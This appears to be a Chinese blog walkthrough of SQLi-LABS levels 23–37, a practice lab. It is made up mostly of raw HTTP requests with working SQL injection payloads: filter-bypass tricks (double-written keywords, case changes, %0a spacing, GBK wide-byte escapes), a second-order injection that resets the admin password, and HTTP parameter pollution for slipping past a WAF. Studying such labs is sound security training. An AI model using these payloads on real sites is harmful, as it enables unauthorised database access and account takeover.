SQLi-LABS Page-2 (Adv Injections)

Less-23 Error Based- no comments

在查看源码后发下对于注释进行了过滤

QQ截图20220622150427.jpg

GET /Less-23/?id=1' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

QQ截图20220622150510.jpg

Less-24 - Second Degree Injections

目的是二次注入,先注册一个admin'#的用户,然后利用特定用户名修改密码,去修改其他用户的密码,绕过了mysqli_real_escape_string的转义

QQ截图20220622154007.jpg

然后登录这个用户

QQ截图20220622154026.jpg

然后直接改密码,就会修改admin帐号的密码

QQ截图20220622154133.jpg

#执行的sql语句
UPDATE users SET PASSWORD='2' where username='admin'#' and password='1'

Less-25 Trick with OR & AND

GET /Less-25/?id=-1' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622155351.jpg

GET /Less-25/?id=-1' || updatexml(1,concat('^',(select database()),'^'),1) || '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622155740.jpg

审计代码之后最直接的是通过双写绕过

GET /Less-25/?id=-1' anandd updatexml(1,concat('^',(select database()),'^'),1) anandd '1'='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171630.jpg

Less-25a Trick with OR & AND Blind

GET /Less-25a/?id=-1 union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622160141.jpg

Less-26 Trick with comments

GET /Less-26/?id=-1'||updatexml(1,concat('^',database(),'^'),1)||'1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

Less-26a Trick with comments

GET /Less-26a/?id=-1')anandd(if((length(database())=8),sleep(5),1))anandd('1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171122.jpg

QQ截图20220622171146.jpg

也可以改成布尔值根据显示结果判断是否正确

GET /Less-26a/?id=-1')anandd(if((length(database())=8),0,1))anandd('1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220622171350.jpg

QQ截图20220622171406.jpg

Less-27 Trick with SELECT & UNION

关键字过滤的可以用多次双写进行绕过,如果没有空格可以用换行%0a代替

QQ截图20220623143246.jpg

GET /Less-27/?id=0'%0auniunionon%0assselectelectelect%0a1,version(),database()%0a'1 #--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623143302.jpg

也可以利用大小写绕过

GET /Less-27/?id=0'%0aUniOn%0aSelEct%0a1,version(),database()%0a'1 #--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623143825.jpg

Less-27a Trick with SELECT & UNION

GET /Less-27a/?id=100"%0aUniOn%0aSelEct%0a11,version(),database()%0a"1  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623145603.jpg

Less-28 Trick with SELECT & UNION

过滤了/union\s+select/i可以在关键字中间加入all破坏队形

QQ截图20220623150307.jpg

GET /Less-28/?id=1000')%0aUniOn%0aall%0aSelEct%0a11,version(),concat('^',database(),'^  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623150337.jpg

Less-28a Trick with SELECT & UNION

GET /Less-28a/?id=1000')%0aUniOn%0aall%0aSelEct%0a11,version(),concat('^',database(),'^  HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623150422.jpg

Less-29-31

QQ截图20220623151757.jpg

服务器端有两个部分：第一部分为 tomcat 为引擎的 jsp 型服务器，第二部分为 apache为引擎的 php 服务器，真正提供 web 服务的是 php 服务器。工作流程为：client 访问服务器，能直接访问到 tomcat 服务器，然后 tomcat 服务器再向 apache 服务器请求数据。数据返回路径则相反
此处简单介绍一下相关环境的搭建。环境为 ubuntu14.04。此处以我搭建的环境为例，我们需要下载三个东西：tomcat 服务器、jdk、mysql-connector-java.分别安装，此处要注意jdk 安装后要 export 环境变量，mysql-connector-java 需要将 jar 文件复制到 jdk 的相关目录中。接下来将 tomcat-files.zip 解压到 tomcat 服务器 webapp/ROOT 目录下，此处需要说明的是需要修改源代码中正确的路径和 mysql 用户名密码。
重点：index.php?id=1&id=2，你猜猜到底是显示 id=1 的数据还是显示 id=2 的？

QQ截图20220623151857.jpg

此处我们想一个问题：index.jsp?id=1&id=2 请求，针对第一张图中的服务器配置情况，客户端请求首先过 tomcat，tomcat 解析第一个参数，接下来 tomcat 去请求 apache（php）服务器，apache 解析最后一个参数。那最终返回客户端的应该是哪个参数？
Answer：此处应该是 id=2 的内容，应为时间上提供服务的是 apache（php）服务器，返回的数据也应该是 apache 处理的数据。而在我们实际应用中，也是有两层服务器的情况，那为什么要这么做？是因为我们往往在 tomcat 服务器处做数据过滤和处理，功能类似为一个 WAF。而正因为解析参数的不同，我们此处可以利用该原理绕过 WAF 的检测。该用法就是 HPP（HTTP Parameter Pollution），http 参数污染攻击的一个应用。HPP 可对服务器和客户端都能够造成一定的威胁。

Less-29 Protection with WAF

默认没有外层的tomcat,直接就访问了

GET /Less-29/?id=-1' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152059.jpg

Less-30 Protection with WAF

默认没有外层的tomcat,直接就访问了

GET /Less-30/?id=-1" union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152219.jpg

Less-31 FUN with WAF

默认没有外层的tomcat,直接就访问了

GET /Less-31/?id=-1") union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623152301.jpg

Less-32 Bypass addslashes()

通常来说，一个gbk编码汉字，占用2个字节。一个utf-8编码的汉字，占用3个字节。在php中，我们可以通过输出echo strlen("和");来测试。当将页面编码保存为gbk时输出2，utf-8时输出3。
我们这里的宽字节注入是利用mysql的一个特性，mysql在使用GBK编码的时候，会认为两个字符是一个汉字（前一个ascii码要大于128，才到汉字的范围）。如果我们在地址后先加一个%df，再加单引号，GBK编码中反斜杠的编码为%5c，而%df%5c表示繁体字連，所以这时单引号成功逃逸

GET /Less-32/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623155622.jpg

Less-33 Bypass addslashes()

GET /Less-33/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623160654.jpg

Less-34- Bypass Add SLASHES

POST /Less-34/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 78
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-34/?id=-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

uname=Dumb1%df' union select version(),database()--+&passwd=1111&submit=Submit

QQ截图20220623161202.jpg

Less-35 why care for addslashes()

GET /Less-35/?id=-1 union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623161640.jpg

Less-36 Bypass MySQL Real Escape String

GET /Less-36/?id=-1%df' union select 1,version(),database()--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220623162329.jpg

Less-37- MySQL_real_escape_string

POST /Less-37/ HTTP/1.1
Host: 192.168.50.10:83
Content-Length: 78
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:83
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:83/Less-37/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

uname=Dumb1%df' union select version(),database()--+&passwd=1111&submit=Submit

QQ截图20220623162501.jpg

手机上阅读

最后一次更新于2022-06-24 09:48

神出鬼没的Enderman

long long ago,I was born.

Less-23 Error Based- no comments

Less-24 - Second Degree Injections

Less-25 Trick with OR & AND

Less-25a Trick with OR & AND Blind

Less-26 Trick with comments

Less-26a Trick with comments

Less-27 Trick with SELECT & UNION

Less-27a Trick with SELECT & UNION

Less-28 Trick with SELECT & UNION

Less-28a Trick with SELECT & UNION

Less-29-31

Less-29 Protection with WAF

Less-30 Protection with WAF

Less-31 FUN with WAF

Less-32 Bypass addslashes()

Less-33 Bypass addslashes()

Less-34- Bypass Add SLASHES

Less-35 why care for addslashes()

Less-36 Bypass MySQL Real Escape String

Less-37- MySQL_real_escape_string

SQLi-LABS Page-1 (Basic Challenges)

SQLi-LABS Page-3 (Stacked Injections)